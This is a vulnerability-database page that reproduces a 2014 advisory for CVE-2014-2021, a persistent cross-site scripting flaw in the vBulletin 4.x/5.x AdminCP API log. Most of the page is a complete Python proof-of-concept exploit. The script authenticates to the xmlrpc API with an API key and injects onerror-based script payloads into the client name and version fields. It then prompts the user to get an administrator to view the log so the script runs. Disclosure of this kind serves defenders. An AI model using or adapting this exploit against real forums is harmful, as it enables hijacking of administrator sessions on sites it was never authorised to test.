Vulners
Lucene search
vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2014-2021 | 25 Oct 201400:55 | – | attackerkb |
 | CVE-2014-2021 | 25 Oct 201400:00 | – | cve |
 | CVE-2014-2021 | 25 Oct 201400:00 | – | cvelist |
 | EUVD-2014-2073 | 7 Oct 202500:30 | – | euvd |
 | vBulletin 4.x5.x - AdminCPApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting | 12 Oct 201400:00 | – | exploitpack |
 | CVE-2014-2021 | 25 Oct 201400:55 | – | nvd |
 | vBulletin 5.x / 4.x Persistent Cross Site Scripting | 12 Oct 201400:00 | – | packetstorm |
 | Cross site scripting | 25 Oct 201400:55 | – | prion |
CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)
================================================================================================
Overview
--------
date : 10/12/2014
cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base
cwe : 79
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x and 5.x (to date); verified <= 4.2.2 ; <= 5.0.x
* vBulletin 5.0.5 (verified)
* vBulletin 4.2.2 (verified)
* vBulletin 4.2.1 (verified)
* vBulletin 4.2.0 PL2 (verified)
exploitability :
* remotely exploitable
* requires authentication (apikey)
* requires non-default features to be enabled (API interface, API-Logging)
* requires user interaction to trigger exploit (admincp - admin views logs)
patch availability (to date) : None
Abstract
---------
vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name)
allowing the remote xmlrpc client to inject code into the xmlrpc API logging page.
Code is executed once an admin visits the API log page and clicks on the API clients name.
risk: rather low - due to the fact that you the api key is required
you can probably use CVE-2014-2023 to obtain the api key
Details
--------
vulnerable component:
./admincp/apilog.php?do=viewclient
apilog.php does not sanitize xmlrpc client provided data before passing it to
print_label_row to generate the output page.
Proof of Concept (PoC)
----------------------
see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
1) prerequisites
1.1) enable API, generate API-key
logon to AdminCP
goto "vBulletin API"->"API-Key" and enable the API interface, generate key
goto "vBulletin API"->"API-Log" and enable all API logging
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
run PoC, wait for SUCCESS! message
3) trigger exploit
logon to AdminCP
goto "vBulletin API"->"API-Log" and hit "view"
in search results click on "client name"
the injected msgbox pops up
Timeline
--------
2014-01-14: initial vendor contact - no reply
2014-01-24: vendor contact - no reply
2014-10-13: public disclosure
Contact
--------
tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
(0x721427D8)
- - -
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib
class Exploit(object):
baseurl = None
cookies = None
def __init__(self,baseurl,params, debuglevel=1):
self.cookies = cookielib.LWPCookieJar()
handlers = [
urllib2.HTTPHandler(debuglevel=debuglevel),
urllib2.HTTPSHandler(debuglevel=debuglevel),
urllib2.HTTPCookieProcessor(self.cookies)
]
self.browser = urllib2.build_opener(*handlers)
self.baseurl=baseurl
self.params = params
def call(self,path="",data={}):
assert(isinstance(data,dict))
data = urllib.urlencode(data)
req = urllib2.Request("%s%s"%(self.baseurl,path),data)
req.add_header("Content-Type", "application/x-www-form-urlencoded")
return self.browser.open(req)
def call_json(self,path=None,data={}):
try:
x=self.call(path,data).read()
print "raw_response", x
resp = json.loads(x)
except urllib2.HTTPError, he:
resp = he.read()
return resp
def vb_init_api(self):
params = {'api_m':'api_init'}
params.update(self.params)
data = self.call_json("?%s"%(urllib.urlencode(params)))
self.session = data
return data
def vb_call(self, params):
api_sig = self._vb_build_api_sig(params)
req_params = self._vb_build_regstring(api_sig)
params.update(req_params)
data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
if not isinstance(data, dict):
return data
if 'errormessage' in data['response'].keys():
raise Exception(data)
return data
def _ksort(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( "%s=%s"%(key,value))
return "&".join(ret)
def _ksort_urlencode(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( urllib.urlencode({key:value}))
return "&".join(ret)
def _vb_build_api_sig(self, params):
apikey = self.params['apikey']
login_string = self._ksort_urlencode(params)
access_token = str(self.session['apiaccesstoken'])
client_id = str(self.session['apiclientid'])
secret = str(self.session['secret'])
return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
def _vb_build_regstring(self, api_sig):
params = {
'api_c':self.session['apiclientid'],
'api_s':self.session['apiaccesstoken'],
'api_sig':api_sig,
'api_v':self.session['apiversion'],
}
return params
if __name__=="__main__":
TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php"
APIKEY = "G4YvWVhp"
DEBUGLEVEL = 0 # 1 to enable request tracking
print "vBulletin 5.x / 4.x - XSS in API"
### 1. XSS
'''
vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options
* enable vbulletin API = yes
* enable API log = yes
xss in:
1) http://xxxx/vb/admincp/apistats.php?do=client
2) click on hex<video><source/**/onerror='alert(1)'>hex
2.1) e.g. http://xxxx/vb/admincp/apilog.php?do=viewclient&apiclientid=1
'''
params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1",
'clientversion':"hex<video><source/**/onerror='alert(2)'>hex2",
'platformname':"hex<video><source/**/onerror='alert(3)'>hex3",
'platformversion':"hex<video><source/**/onerror='alert(4)'>hex4",
'uniqueid':"hex<video><source/**/onerror='alert(5)'>hex5",
'apikey':APIKEY}
print "[ 1 ] - xss - inject alert() to admincp"
x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL)
vars = x.vb_init_api()
print vars
"""
$calls = array(
'methods' => array(
'login_login', 'api_init'
),
'login_login' => array(
'POST' => array(
'vb_login_username' => 'admin',
'vb_login_password' => 'password',
),
),
'api_init' => array(
'sessionhash' => '{session.dbsessionhash}'
)
);
"""
print "[*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>')
'''
calls = {'methods':['api_init'],
'api_init':{
'sessionhash':vars['sessionhash']
}}
'''
# just a dummy call
x.vb_call(params={'api_m':'api_forumlist',
'type':'t',
'x':"1"})
print "[ *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid'])
print "-- quit --"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Oct 2014 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 23.5
EPSS0.00912